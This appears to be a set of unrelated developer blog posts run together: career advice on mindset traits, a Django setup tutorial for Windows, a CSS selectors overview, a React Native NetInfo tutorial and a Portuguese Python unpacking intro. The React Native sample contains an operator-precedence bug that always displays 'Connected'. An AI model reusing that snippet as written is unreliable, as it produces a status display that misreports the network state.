> * True senior devs acknowledge that character traits are malleable, are self-aware of their mindset, and deliberately work on it. This is the superpower that makes them stand out from the crowd and accelerates their career.
> * In this post, I'll discuss the 10 most critical traits of a successful developer, why are they important, and share a few tips on how you can shape them.
## 3 things you need to succeed as a software developer
Professional software development is a complex discipline, which requires a diverse set of abilities to succeed. We can group them into three main categories:
### Technical skills
This is the most obvious group. To be a successful developer, you need to be good at your trade: programming languages and frameworks, clean code principles, architecture, testing, debugging, and so on. You also need to be skillful with your tools: version control, command line, IDE.
However, technical skills alone won't get you far in a professional, team-based setup. That's why you also need soft skills.
### Soft skills
To be able to work on big, commercial projects you need a solid set of soft skills: teamwork, communication, project management and planning, remote work, self-organization, learning, personal productivity, and similar.
Many of us find these skills less fun than the technical ones, and thus we often neglect them - so they can already separate solid, professional developers from the crowd. But at least we acknowledge them.
There's also a third category, though, which is equally important but flies under the radar of almost all, even the otherwise good, developers.
### Mindset
Mindset is kinda similar to soft skills, but the "skills" it's comprised of are more fundamental, core traits: curiosity, patience, empathy, grit, adaptability, and so on.
On some level, we know these traits are important for a successful software development career. But because they seem an innate, fixed part of our personality, we do not attempt to deliberately learn them in the same way we learn project management or personal productivity techniques.
This makes us blind to a huge and important part of our skillset and can badly hurt our progression.
## Why being blind to your mindset can jeopardize your career
Software development is a complex, sometimes frustrating, and insanely fast-moving field. Learning, growing, and staying relevant as a developer (and not burning out in the process) requires a specific mix of character traits.
At the same time, it's a 100% team game. Lone-wolf hackers have no place in professional software development, no matter how good they are technically. And functioning well in a team requires another, seemingly opposite, set of traits.
Mindset is something different than skills. Understanding Agile development principles is not the same as being adaptable and open to frequent change. And knowing the debugging techniques is not the same as having the curiosity and persistence to actually enjoy chasing the problem for several hours without getting burned out or discouraged. But while these traits may seem fixed, innate to our personality, they are equally learnable as skills.
Without understanding what traits are critical for a programmer and deliberately honing them over time, you'll never reach your full potential. True senior developers know this, are self-aware of their mindset, and continuously work on improving it. This is the differentiator, the superpower that separates the best developers from the crowd.
Ok, but which traits are the most important? Let's dive a bit deeper into the details.
## 10 traits of a true senior developer
### 1. Curiosity
If I had to summarize in one sentence what software development is about, I'd say it's about learning. You need to stay up-to-date with constantly evolving technologies and software development processes. You need to learn the deep details of complex business domains (several ones throughout your career). Analyzing and clarifying requirements is learning. Research is learning. Performance optimization and debugging - in other words, poking deeply into the inner workings of code - is a kind of learning as well.
Software development is also about working with people (and *for* people). You'll be working on cross-functional teams, with a diverse set of people from different specializations and backgrounds (nowadays, in the age of remote, most probably from multiple countries and cultures). You'll have to understand "business". You'll have to understand and solve user pain points and problems.
Without a healthy dose of curiosity, you'll not only be less effective at all those things but you'll also burn out pretty quickly.
### 2. Affinity for problem-solving
Software development is a giant puzzle - an infinite stream of problems to solve. The reason you are hired as a developer is to solve your company's and customers' problems. To do this, you need to solve organizational problems (how to function as a team, how to organize your work, what processes to use) and technical problems (logic, architecture, performance, and so on). These problems consist of even smaller, nested problems, down to atomic problems like how to design and name a particular function or unit test.
If you don't enjoy solving such puzzles, if you don't have a knack for breaking down and untangling problems, your software development career will be a struggle.
### 3. Patience
Becoming a true senior developer requires years of deliberate practice. You'll also experience a lot of setbacks along the way. Developing your career is rewarding but also a slow and sometimes painful process. To achieve excellence and get to the top, you must be ready for lifelong dedication. And this requires a lot of patience.
Patience is also critical for a lot of things adjacent to our job: handling technical support, working with not-very-tech-savvy users, coping with organizational bureaucracy. Plus, it's a great problem-solving aid. And you won't sustain working in such a fast-moving, constantly changing industry as tech without patience.
### 4. Grit (in just the right amount)
Software development requires a lot of persistence. Hunting bugs. Deciphering poorly documented APIs and libraries. Untangling legacy code. Tracking down performance bottlenecks. Even simply sustaining a deep focus for extended periods of time.
You'll struggle, and fail, and get stuck, and get frustrated a lot - no matter how senior you are. And you'll need a lot of grit to plow through and not get burned out.
But you also need to understand what's the right amount of grit. What's the sweet spot between unproductively banging your head against the wall for hours and days vs constantly disrupting your team by requesting assistance immediately when you hit even the smallest bump in the road.
### 5. Emotional intelligence
Software development revolves around people and teams. You'll work very closely with your colleagues at an individual level: pair program, debug together, review their code. You'll also work with them in a team setup: brainstorm, plan, and make decisions as a group. And this collaboration is messy: your work will overlap or conflict, you'll have different opinions. You'll negotiate your roadmap with management. Finally, to build a great product, you'll have to put yourself in your users' shoes.
On top of that, all these people come from diverse backgrounds, both technical and non-technical. They are passionate. They have strong opinions. They may sometimes have difficult characters. And your success as a developer depends on how well you can build rapport with them. Without high emotional intelligence, it'll simply be impossible.
### 6. Ability to keep your ego in check
Software development (and working in a team in general) is a balancing act. On one hand, you're hired for your expertise. You're expected to have strong opinions and to guide less tech-savvy or more junior people. On the other hand, you'll work with equally experienced and opinionated teammates, who will challenge your point of view and with whom you'll have to make group decisions.
Your ego will often get hurt in the process. You must be able to keep it in check - but without getting withdrawn and disengaged.
You must be opinionated but not a zealot. Have a strong point of view but hold it weakly, be open to getting convinced otherwise. You must be ready to defend your opinion but also know when to let go, to not be a condescending, brilliant jerk. You need to respect the team, business, and customers. Be able to disagree but commit. And gracefully take constructive (and even purely negative) feedback. Otherwise, you won't be able to effectively work in a team.
### 7. Adaptability
Everything in software development is moving so fast. Technologies are constantly changing. New methodologies get popular. Companies pivot.
Throughout your career, you'll be also changing projects, teams, companies, and business domains. Even a single project is a constant act of inspecting and adapting (especially in agile approaches). And your team will constantly self-reorganize, too.
Most people are allergic to change. Change is hard. It's uncomfortable. It's stressful. Being adaptable and open to change will instantly set you apart. It will not only let you climb to the top of the seniority ladder but it will also let you *stay there* for a long time.
### 8. Reliability
I'm repeating it ad nauseam, but software development is a team game. Your colleagues, manager, and company - they all count on you to do your part. Nobody ever will consider you a true senior developer - no matter your tech expertise - if they can't rely on you to take care of your work and deliver on your promises without having to be micromanaged.
It doesn't mean you can never make any mistakes. Failures happen. And the best companies see them as valuable learning opportunities. But to enable this, you need to be able to pick up a dropped ball, gracefully recover, and be trusted to learn from your failure and not repeat it in the future.
### 9. Pragmatism
Professional software development is an art of tradeoffs. You constantly need to compromise between development speed and quality. Balance new and promising with proven and stable. Walk a thin line between under- and over-engineering.
To succeed in professional software development you need to be very pragmatic. You need to understand that nothing is black and white, that no principle or pattern holds true in every situation. You must have great intuition for making tradeoffs between different approaches, technologies, and solutions; feel comfortable cutting corners but have a good sense of how much.
### 10. Positive outlook
Your life as a programmer is not all sunshine and rainbows. You'll meet annoying customers. Face tight deadlines. Your project may get canceled. You may disagree with your team or management but still have to commit and execute. You'll also work with ugly code. (Yes, every codebase has good and bad parts, even at the top companies like Google.)
You'll get tired, frustrated, upset.
If you let negativity take over, if you start criticizing and complaining, you'll not only demotivate yourself but you'll also kill the morale of your team - which won't take your career very far.
You need to be biased toward the positive. Be optimistic and cheerful. Always look for a silver lining. Be the person who rallies their team, kills the bad mood, and restores morale. It'll not only get you noticed and promoted, it'll also make your career more pleasant and sustainable.
## BONUS: A few tips on how to deliberately shape your mindset
Skills, obviously, can be trained - both soft and technical ones. You can get better at debugging as well as at communication. But what about such seemingly innate traits like curiosity or a positive outlook? Can you really train yourself to be more optimistic or curious?
Yes, you can! This is a vast topic, worth several books ("Mindset" by Carol S. Dweck is a great starting point). But let me quickly share a couple of tips:
* Acknowledge that your mindset is not fixed, that your traits are malleable.
* Build self-awareness. Observe how you react in different situations. Try to understand what makes you feel in a particular way (curious vs bored, positive vs grumpy, eager vs defensive).
* Retrospect on your behavior from a perspective of a day or two. Was your opinion really pragmatic or was it your ego talking? How could you have acted differently?
* Prepare in advance. Pre-plan up-front how you'll behave next time in a similar situation and identify the right trigger that will remind you about your plan when the time comes.
* Expose yourself to situations that will let you exercise and strengthen desired traits. Actively look for such opportunities.
* Focus on a single trait for some time. It will make it easier to find opportunities to exercise it and to increase your self-awareness of this trait.
* Reframe. Be conscious and deliberate about how you talk to yourself. The idea isn't stupid, it's surprising. That shiver isn't anxiety, it's excitement. The problem isn't frustrating, it's interesting.
* Enlist help. Don't shy away from asking your colleague or manager for feedback - or even to become your "accountability partner" who will catch and point out your unwanted behavior.
I also encourage you to learn a bit about cognitive biases and habit forming. This is a well-developed discipline, with a huge body of knowledge, and pretty fun to explore.
## Bottom line
If you want to be a true senior developer, you have to be a complete one. You must have the right mix of tech skills, soft skills, and character traits and you can't ignore any part of this trio.
Character traits are the most tricky part. Most developers neglect them because they are either not self-aware of them, don't know which ones are important, or don't believe they are malleable.
But if you can overcome this flawed way of thinking - if you can change your mindset - you can turn it into a superpower that will elevate your career and make you truly stand out.
---
😎 Are you a **_TRUE_ senior dev**? 😎 Are you on the right track to becoming one? ➡️ **[CHECK MY ULTIMATE GUIDE TO FIND OUT](https://trueseniordev.com/5L9Z).** ⬅️ | zawistowski |
1,411,592 | Optimised Django App Setup in Windows VSCode 🚀🐍🛠️ | Setting up a new Django project is a multi-step process that involves installing various tools and... | 22,336 | 2023-03-28T17:09:38 | https://dev.to/siwhelan/optimized-django-app-setup-in-windows-vscode-lg2 | python, django, docker, beginners | Setting up a new Django project is a multi-step process that involves installing various tools and packages, creating directories, and configuring settings. This process can take up valuable time and effort that could be better spent on developing your app's functionality.
To help streamline the process and make it easier to start my own Django projects, I created a step-by-step guide that combines essential tools and best practices like VSCode, venv, and .gitignore. As I found it helpful myself, I thought it might be beneficial to share it with other developers learning Django.
In this tutorial, I'll guide you through my process of setting up a new Django web app quickly and efficiently. We'll cover everything from installing Python and Django to creating a virtual environment and generating a requirements.txt file. By the end of this tutorial, you'll have a fully functioning Django app up and running! 🚀🐍🛠️
We're going to build a basic [Django](https://www.djangoproject.com/) app that interacts with the Internet Archive's [Wayback Machine](https://archive.org/web/) API. While intentionally simple, this app demonstrates the use of various technologies and best practices, making it a perfect example for our easy to follow Django app template.
Our app will allow users to input a URL and an optional timestamp, and then check if the Wayback Machine has a snapshot of that URL available. If a snapshot exists, the app will display the archived content; if not, it will inform the user that the URL isn't available in the Wayback Machine.
Here's a quick overview of the app's functionality:
1) We define a `check_wayback_availability()` function that takes a URL and an optional timestamp as arguments. It sends a GET request to the Wayback Machine API and returns the JSON data.
2) The `index` view function handles both GET and POST requests. If it receives a POST request, it retrieves the URL and timestamp from the request, checks the Wayback Machine for a snapshot, and renders the appropriate template based on the availability of the URL.
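As a preview of what we'll build, a minimal sketch of that availability check could look like the following. It uses only the standard library (in the app itself you might prefer `requests`), it targets the Wayback Machine's public `archive.org/wayback/available` endpoint, and the `closest_snapshot_url` helper is a hypothetical name added here for illustration:

```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

WAYBACK_API = "https://archive.org/wayback/available"

def check_wayback_availability(url, timestamp=None):
    """Query the Wayback Machine availability API and return its JSON data."""
    params = {"url": url}
    if timestamp:
        params["timestamp"] = timestamp  # expected format: YYYYMMDDhhmmss
    with urlopen(f"{WAYBACK_API}?{urlencode(params)}") as resp:
        return json.load(resp)

def closest_snapshot_url(data):
    """Helper (illustrative, not from the article): pull the archived
    snapshot URL out of the API response, or return None if unavailable."""
    snapshot = data.get("archived_snapshots", {}).get("closest", {})
    return snapshot.get("url") if snapshot.get("available") else None
```

The view can then render the archived content's URL when `closest_snapshot_url` returns a value, and a "not available" template otherwise.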
Although the app itself is fairly simple, it showcases how our Django app template can be used to set up a project quickly and efficiently. By following this tutorial, you'll learn how to implement this app while building a time-saving optimised template that you can use in future projects.
First off, let's build a basic Django environment -
Step 1: Install Python 3 and Django
Make sure you have Python 3 and Django installed on your system. You can download Python from the [official website](https://www.python.org/downloads/) and install Django using pip:
```
pip install django
```
Step 2: Install VSCode
If you haven't already, download and install [Visual Studio Code](https://code.visualstudio.com/)
Step 3: Open VSCode and launch the terminal
Open VSCode and press Ctrl+~ or click on 'Terminal' in the top menu, then select 'New Terminal' to open the integrated terminal.
Step 4: Create a new directory for your project
Create a new directory for your project using the following commands. I've called mine 'wayback', but you can call yours whatever you like!
mkdir wayback
cd wayback
Step 5: Create a virtual environment
python -m venv venv
This will create a virtual environment named "venv" in your project directory.
Step 6: Activate the virtual environment
.\venv\Scripts\Activate
Your terminal should now show the virtual environment's name in the prompt.
Step 7: Install Django in the virtual environment
pip install django
Step 8: Start a new Django project
django-admin startproject wayback_project .
This will create a new Django project in your current directory.
Step 9: Create a new Django app
python manage.py startapp wayback_app
Step 10: Run the development server
Run the development server using the following command:
python manage.py runserver
You should see a message saying that the development server is running at http://127.0.0.1:8000/.
Open a browser and visit http://127.0.0.1:8000/ to see your new Django web app running. It should look something like this -

You now have a Django web app running in a virtual environment using Python 3 in the VSCode terminal on Windows!
Ok, we've successfully set up a basic Django environment and created a new project and app. Now, it's time to set up `urls.py` in your Django project so that your app's URLs can be included in your project's URLs. In a Django project, you can create multiple apps, each with its own URLs. However, to make these app URLs accessible within the project, you need to include them in the project's main URLs. This enables users to navigate through the app's URLs within the project's URL structure.
In your Django project, open the `your_project_name/urls.py` file, where `your_project_name` is the name of your Django project; in this example, mine is 'wayback_project'. Import the `include` function by modifying the existing import statement at the top of the file:
```python
from django.urls import path, include
```
In the urlpatterns list, add a new entry that includes the URLs from your app:
```python
path('wayback_app/', include('wayback_app.urls')),
```
Now, you need to create a urls.py file inside your app's directory. In the VSCode terminal, run:
type nul > wayback_app\urls.py
This command will create an empty urls.py file inside your app's directory.
Open the newly created urls.py file in your app's directory, and add the following content:
```python
from django.urls import path
from . import views
urlpatterns = [
# Add your app's URL patterns here
]
```
This file is where you will define the URL patterns specific to your app.
Now your Django project is set up to include URLs from your app. As you create new views in your app, you can add corresponding URL patterns to the urls.py file in your app's directory. Make sure to update the urlpatterns list in the wayback_app/urls.py file with the new paths.
After you have installed all the necessary packages for your Django project, you can use the pip freeze command to generate a requirements.txt file containing a list of all the installed packages and their versions.
To generate the requirements.txt file, navigate to your project directory in the VSCode terminal and run the following command:
```
pip freeze > requirements.txt
```
This will create a requirements.txt file in your project directory containing a list of all the installed packages and their versions.
You can then use this file to install the same packages and their versions in a different environment by running the following command:
pip install -r requirements.txt
This will install all the packages listed in the requirements.txt file in the current environment.
A requirements.txt file ensures all required packages are installed, making it easier to reproduce the same environment in different places. This is crucial for Docker, which requires consistent environments to prevent issues and inconsistencies when running an app in a containerised environment.
To add a `.gitignore` file to your Django project, follow these steps:
In the VSCode terminal, navigate to the root of your project directory if you are not already there.
Create a new .gitignore file:
type nul > .gitignore
This command will create an empty .gitignore file in your project directory.
Open the .gitignore file in VSCode by clicking on it in the file explorer or using the File > Open menu.
Add the following content to the .gitignore file to exclude common files and directories that should not be tracked by Git:
# Python artifacts
__pycache__/
*.pyc
*.pyo
*.pyd
.Python
env/
venv/
ENV/
# Django artifacts
*.log
*.pot
*.pyc
db.sqlite3
media/
# VSCode artifacts
.vscode/
# Git artifacts
.git/
Save the file by pressing Ctrl+S or clicking File > Save.
You now have a .gitignore file in your Django project that excludes common files and directories from being tracked by Git. You can customize the file to include or exclude any additional files or directories specific to your project.
Now that you have a basic Django app up and running, let's add some basic HTML and CSS to our web app. This will help to make our app more visually appealing and user-friendly.
Create two folders inside your wayback_app folder named 'static' and 'templates'.
Inside the 'static' folder, create the nested folders 'wayback_app/css', and inside 'css' create a new file named 'styles.css'. This `static/wayback_app/...` layout namespaces the static files to the app and matches the paths referenced below. Open 'styles.css' and paste the following code:
```css
body {
font-family: Arial, sans-serif;
}
.welcome {
color: darkblue;
}
```
Inside the 'templates' folder, create a 'wayback_app' subfolder, and inside it a new file named 'index.html'. Add the following code:
```html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wayback App</title>
<link rel="stylesheet" href="{% static 'wayback_app/css/styles.css' %}">
</head>
<body>
<h1 class="welcome">Welcome to the Wayback App!</h1>
</body>
</html>
```
Open the settings.py file located in the wayback_project folder, and modify the TEMPLATES and STATIC_URL settings as follows:
```python
TEMPLATES = [
{
...
'APP_DIRS': True,
...
},
]
STATIC_URL = '/static/'
```
You'll also need to add your app to the INSTALLED_APPS setting - it should look something like this:
```python
INSTALLED_APPS = [
"wayback_app",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
```
Almost there! Now open the views.py file in wayback_app and add the following lines:
```python
from django.shortcuts import render
def home(request):
return render(request, 'wayback_app/index.html')
```
This code is like a recipe for creating a webpage. It has a function called `home()` that takes a request (like a message) and uses it to put together an HTML page. It uses a Django function called render to take the `index.html` file in the wayback_app folder and put it together into a page for the user to see.
So when someone goes to a certain URL on your website, this code helps create the page that they see.
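One thing to note: for http://localhost:8000/wayback_app/ to resolve, the `home` view also needs an entry in the `urlpatterns` list of the `wayback_app/urls.py` file we created earlier. A minimal sketch (the route name is my choice):

```python
from django.urls import path
from . import views

urlpatterns = [
    # An empty route string maps /wayback_app/ itself to the home view
    path('', views.home, name='home'),
]
```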
Finally, run the development server again using the following command:
```
python manage.py runserver
```
Now, when you visit http://localhost:8000/wayback_app/, you should see the "Welcome to the Wayback App!" message, and if your static file is correctly set up, it should be in blue!

Ok, that's enough for Part 1 of this series! In the next part we'll build our app, implement some more complex HTML and CSS to make the app more visually pleasing, and package it in a Docker container with all its dependencies, making it easy to deploy and run on any machine.
Hope you've found this helpful so far, and if you have any questions please ask!
Thanks for reading! 👋
| siwhelan |
1,411,622 | Revolutionize Your CSS Skills with These 8 Cutting-Edge CSS Features | Introduction: Having all the CSS concepts and remembering them is quite difficult, so here... | 0 | 2023-03-22T21:09:55 | https://dev.to/abdulrahmanismael/revolutionize-your-css-skills-with-these-8-cutting-edge-css-features-1gil | webdev, css, codenewbie, frontend | ## Introduction:
Having all the CSS concepts and remembering them is quite difficult, so here I will go over the most important CSS concepts that will take your CSS knowledge to the next level…
---
## Now, get your pen and paper ready because we have some exciting new CSS features to unveil:
### **1- “:empty” Pseudo-Class:**
- A handy pseudo-class is ":empty", which styles any element that contains no child nodes (child elements, text, etc.). For example, you can hide an empty element and later fill it with JavaScript, at which point these styles no longer apply because the element is no longer empty.
- This is useful in a variety of situations, including the example we just mentioned.
```
p:empty{
display: none;
}
```
- The element is hidden only while it is empty; otherwise, it shows up on the screen with its children.
### **2- “:target” Pseudo-Class:**
- Sometimes you want links that jump to some place on the same page, and at that moment you need some "focus styling" on the place you are jumping to; that's why the ":target" pseudo-class exists…
- The ":target" pseudo-class styles the element on the page that is targeted by a link on the same page.
```
section:target{
outline: 2px solid #ff0000;
}
```
### **3- “:only-child” | “:only-of-type” Pseudo-Classes:**
- “:only-child” pseudo-class is used to style an element that is the only child in its parent element
- “:only-of-type” pseudo-class is used to style an element that is the only element of its type in its parent element.
```
HTML:
<section>
<p class='paragraph'> Hello World </p>
</section>
CSS:
.paragraph:only-child {
color: #666;
}
.paragraph:only-of-type {
border: 1px solid #ff0000;
}
```
### **4- “:has()” Pseudo-Class:**
- This is truly one of the most powerful features added to CSS; it's worth understanding just how powerful this pseudo-class is.
- It is used to style an element, but only if it has a certain child element inside it.
- For instance, say you have two "section" elements and one of them has an "h1" element inside it. Previously, giving the section containing the heading a special style required adding a specific class or id, or using JavaScript.
- But now, using this new feature, it can be done in seconds.
```
HTML:
<section>
<h1> Hello From Section 1 </h1>
</section>
<section>
<p> Hello From Section 2 </p>
</section>
CSS:
section:has(h1) {
border: 1px solid red;
}
```
- Only the first section element that has the “h1” element inside it will have a red border.
### **5- “:is()” Pseudo-Class:**
- This feature will save you a lot of time. It is used to simplify grouping selectors. Its usages:
- grouping element selectors
```
:is(h1,h2,h3,h4,h5,h6) {
margin: 0;
}
```
- grouping pseudo-classes
```
button:is(:hover, :focus) {
border: 1px solid #555;
}
```
### **6- inset property:**
- Save yourself some coding time with this shorthand property, which combines the (top, right, bottom, and left) properties into a single line. It’s a convenient way to streamline your code and make it more efficient.
- And if you’re looking to position an element absolutely and have it fill its parent container, look no further than this property. It’s the perfect solution for achieving a seamless, full-width design.
```
section::after{
position: absolute;
inset: 0;
/* Instead of */
/* top: 0; */
/* bottom: 0; */
/* left: 0; */
/* right: 0; */
}
```
### **7- "vmax" unit:**
- This versatile unit has many applications. For instance, if you want to create a pill-shaped element, simply apply a “border-radius” property with a value of “100vmax”. It’s that easy!
```
div{
.
.
border-radius: 100vmax;
}
```
- It can be used to give an element the full width of the viewport, instead of using “100vw” values and falling into (overflow) issues:
```
div {
box-shadow: 0 0 0 100vmax var(--same-bgColor-of-the-element);
clip-path: inset(0 -100vmax);
}
```
### **8- Advanced Selectors:**
- Knowing these advanced selectors is essential for any web developer, as they can help you achieve complex effects without relying on JavaScript.
- In other words, they’re powerful tools that can streamline your workflow and enhance your coding skills.
```
img[alt]{
/* Selecting any (img) element that has (alt) attribute */
}
img[alt="image"]{
/* Selecting any (img) element that has (alt) attribute
with the value "image" */
}
img[alt^="image"]{
/* Selecting any (img) element that has (alt) attribute
with the letters "image…" at the first of the value */
}
a[href$=".com"]{
/* Selecting any (a) element that has (href) attribute with
the letters "….com" at the end of the value */
}
div[class*="box"]{
/* Selecting any (div) element that has (class) attribute with
the letters "box" anywhere in the value */
}
```
---
## Conclusion:
In conclusion, CSS is constantly evolving, with new features and enhancements being added all the time. By keeping up to date with the latest developments and leveraging the power of advanced selectors, shorthand properties, and versatile units, you can take your CSS skills to the next level and create stunning, responsive designs. So, keep experimenting, keep learning, and keep pushing the boundaries of what’s possible with CSS! | abdulrahmanismael |
1,411,744 | Real-time Network Status Detection with React Native | by Champion Uzoma In today's world, mobile apps need to be able to detect the network state of a... | 0 | 2023-03-23T00:41:46 | https://blog.openreplay.com/real-time-network-status-detection-with-react-native/ | reactnative | by [Champion Uzoma](https://blog.openreplay.com/authors/champion-uzoma)
In today's world, mobile apps need to be able to detect the network state of a device and display appropriate UI to the user based on that state. Whether displaying a custom offline message, a loading indicator, or any other type of UI element, the ability to accurately detect and respond to changes in the network state can greatly improve your app's user experience.
In this tutorial, I will be introducing the `NetInfo` module provided by React Native, which makes it easy to retrieve the current network state and listen for changes in that state. Working with this module, I will go over the different network states and how to display the appropriate UI to the user based on the state of their network.
To follow along, basic knowledge of React Native is essential. You should have completed the [React Native Environment setup](https://reactnative.dev/docs/environment-setup), and for testing the applications, you should have an Android and an iOS simulator running on your computer. If you haven't done these yet, you should find instructions for the [Environment setup here](https://reactnative.dev/docs/environment-setup).
## Detecting & Managing Network Connectivity in Android and iOS
Although it's unfortunate that network connectivity issues are common and can cause frustration and prevent us from completing our tasks, some technologies exist that we can use to manage the situation and stop it from hampering our flow. Whether browsing the web, streaming videos, or connecting with others, having a reliable internet connection is crucial.
The [NetInfo module](https://github.com/react-native-netinfo/react-native-netinfo#readme) in React Native is a powerful tool for detecting the network state of a device. With mobile devices increasingly being used to access the internet, it's important to ensure that your app can handle network connectivity changes gracefully. The NetInfo module is a simple, lightweight module that provides access to network information such as the type of network (Wi-Fi, cellular, etc.), the quality of the network connection (fast, slow, etc.), and whether the device is connected to the internet.
Some key features of the NetInfo module are its cross-platform compatibility and its ability to detect network state changes in real time. This means that the module works on Android and iOS devices, and your app can respond to changes in network state as they occur, ensuring that your app remains functional even if the network state changes while it is running. This is useful in a variety of situations, such as when you need to determine whether a user is connected to a Wi-Fi network or a cellular network; it can be used to detect network failure and display an error message or take other appropriate actions.
## Implementing Network Detection & Management in a React Native Project
I have shared a lot about the Netinfo module, but now it's time to create a React Native project and see how to implement all I've shared in a project. I will be using the React Native default boilerplate interface, so you just need to create your project and follow along with all I will share here. To create a React Native project, refer to this [step-by-step guide](https://reactnative.dev/docs/environment-setup#creating-a-new-application). After creating your project, run it on your Android and iOS emulators, and you should have your emulators showing:

### Installing Netinfo Module
The Netinfo module can be installed from npm by running the command in your terminal from your project's root folder.
```javascript
npm i @react-native-community/netinfo
//To Install iOS dependencies
cd ios && pod install
```
After installing the module and iOS dependencies, run your project in your Android and iOS emulators.
### Detecting & Handling Different Network States
There are different network states, and these can be categorized into Online states, offline states, and unknown states. The Online state indicates that the device is connected to the internet and has a stable network connection. The Offline state indicates that the device is not connected to the internet or has a poor-quality network connection. The Unknown state means that the NetInfo module cannot determine the network state, which could be due to an error or an unsupported platform.
Each of these network states can impact an app's functionality, so it is important to be able to detect and respond to changes in network state as they occur. The NetInfo module provides access to this information so that we can build apps that respond to changes in network state and provide a seamless user experience even in the presence of network connectivity issues.
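To make the three categories concrete, here is a tiny framework-free sketch (the function name and mapping are mine, not part of the NetInfo API) that buckets a NetInfo-style state object into the three states described above:

```javascript
// Maps a NetInfo-style state object to one of the three app-level
// categories: "online", "offline", or "unknown".
function classifyNetworkState(state) {
  // isConnected is null while the network state has not yet been determined.
  if (!state || state.isConnected == null) {
    return "unknown";
  }
  return state.isConnected ? "online" : "offline";
}

console.log(classifyNetworkState({ isConnected: true, type: "wifi" })); // "online"
```

A helper like this keeps the UI logic (which banner or screen to show) decoupled from the raw NetInfo state object.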
### Detecting Network States
To detect network states, I will import the Netinfo module into the project and use the `useNetInfo` hook or the `NetInfo.addEventListener` method to access the network information. The `useNetInfo` hook returns an object that contains the network information, including the type of network, the quality of the connection, and whether the device is connected to the internet. The `NetInfo.addEventListener` method, on the other hand, allows us to add a listener that listens for changes in the network state, and this method takes a callback function as an argument and invokes the function whenever the network state changes.
I will import the Netinfo module into the project to implement this in our project. With the [React useEffect hook](https://reactjs.org/docs/hooks-effect.html), I add an event listener for network state changes using the `NetInfo.addEventListener` function, and it returns an unsubscribe function to stop listening to the changes when the component unmounts. The callback function logs the data to the console on network change. The code is below:
```javascript
//Add this at the top of the page
import NetInfo from "@react-native-community/netinfo";
//Add this within the App component
React.useEffect(() => {
const unsubscribe = NetInfo.addEventListener((state) => {
console.log(state);
});
return () => {
unsubscribe();
};
}, []);
```
Reload your app or turn your network connection on and off, and you should have your console show up like this:

From the data on the console, you can see that you can retrieve the connection type, the connection status, the IP address, etc. when it's online, but when it's offline, it only returns the connection status or false. In the next section, I will create a component that will be displayed when the device is not connected to the internet by listening to network changes and responding accordingly.
### Creating a Network Status component
Now I will create a simple component that will be displayed once the network state indicates that the device isn't connected to the internet. Insert the code below before the app component.
```javascript
const NetworkCheck = ({ status, type }) => {
return (
<View style={styles.container}>
<Text style={styles.statusText}>
Connection Status : {status ? "Connected": "Disconnected"}
</Text>
<Text style={styles.statusText}>Connection Type : {type}</Text>
</View>
);
};
```
Also, add the styles below in the stylesheet component:
```javascript
container: {
flex: 1,
padding: 20,
alignItems: 'center',
justifyContent: 'center',
backgroundColor: '#ff0000',
},
statusText: {
fontSize: 18,
textAlign: 'center',
margin: 10,
color: '#ffffff',
},
```
Next, using the [React useState hook](https://reactjs.org/docs/hooks-state.html), I will create two states that will hold the connection status and connection type so that it is displayed on the screen. When the internet connection isn't available, it'll also show that it's not available. After this, I will create a function to set the state of the connection status and type.
```javascript
const [connectionStatus, setConnectionStatus] = React.useState(false);
const [connectionType, setConnectionType] = React.useState(null);
const handleNetworkChange = (state) => {
setConnectionStatus(state.isConnected);
setConnectionType(state.type);
};
```
Moving on, we will update the [useEffect hook](https://reactjs.org/docs/hooks-effect.html). Now the NetInfo.addEventListener method takes a single argument: the handleNetworkChange function. This callback fires whenever the network state changes. The code is below:
```javascript
useEffect(() => {
const netInfoSubscription = NetInfo.addEventListener(handleNetworkChange);
return () => {
netInfoSubscription && netInfoSubscription();
};
}, []);
```
Finally, for this section, I will update the app component and use a conditional statement to mount the NetworkCheck component we created earlier when there's no internet connection. When it detects an internet connection, it should unmount the NetworkCheck component and mount the app screen. I removed some boilerplate code. The code is below:
```javascript
return (
<>
{connectionStatus ? (
<SafeAreaView style={backgroundStyle}>
<StatusBar barStyle={isDarkMode ? "light-content" : "dark-content"} />
<ScrollView
contentInsetAdjustmentBehavior="automatic"
style={backgroundStyle}
>
<Header />
<View
style={{
backgroundColor: isDarkMode ? Colors.black : Colors.white,
}}
>
<Section
title={
"Connection Status : "+ connectionStatus
? "Connected"
: "Disconnected"
}
></Section>
<Section title={"You are connected by " + connectionType}></Section>
</View>
</ScrollView>
</SafeAreaView>
) : (
<NetworkCheck status={connectionStatus} type={connectionType} />
)}
</>
);
```
If you implemented this correctly as shown, you should have your Android and iOS emulators showing up like so:

## Conclusion
The NetInfo module in React Native provides a simple and powerful tool for detecting the network state of a device. With its ability to detect network state changes in real-time, cross-platform compatibility, and easy integration into React Native apps, it's an essential tool for any React Native developer. Whether you're building a simple app or a complex one, the NetInfo module can help you ensure that your app remains functional and responsive, even in the face of network connectivity changes. With this tutorial, I am sure you will be able to implement it in your project. For the complete source code of this tutorial, refer to my [GitHub repo](https://github.com/championuz/RNNetworkCheck), and if you have any challenges, do well to reach out, as I will be glad to help.
[](https://newsletter.openreplay.com/)
| asayerio_techblog |
1,411,768 | Desempacotamento - *args e **kwargs | Let's understand unpacking, that is, a way we can assign several values at... | 0 | 2023-03-23T01:47:43 | https://dev.to/scjorge/desempacotamento-args-e-kwargs-clp | python, tutorial, programming, braziliandevs | Let's understand unpacking, that is, a way to assign several values at the same time.
First, let's look at a capability Python gives us. We can assign multiple values at once when declaring variables, and our functions can also return more than one value. Let's see:
```python
a, b, c = 1, 2, 3
print(a, b, c, sep=" - ")
```
output:
```
1 - 2 - 3
```
<br>
Wonderful! We assigned 3 values to 3 different variables in a single line. And that is the foundation for today's post.
Now let's play a bit with lists. Let's see:
```python
a, b, c = [1, 2, 3]
print(a, b, c, sep=" - ")
```
output:
```
1 - 2 - 3
```
<br>
We got exactly the same result. In other words, we can use the values of a list in multiple assignments. And, as mentioned, functions can do the same thing, look:
```python
def retorno_multiplo():
return 1, 2, 3
a, b, c = retorno_multiplo()
print(a, b, c, sep=" - ")
```
output:
```
1 - 2 - 3
```
<br>
Great, now that we have a good grasp of multiple assignment, let's get to the point.
Unpacking is basically the idea that we can perform those assignments dynamically.
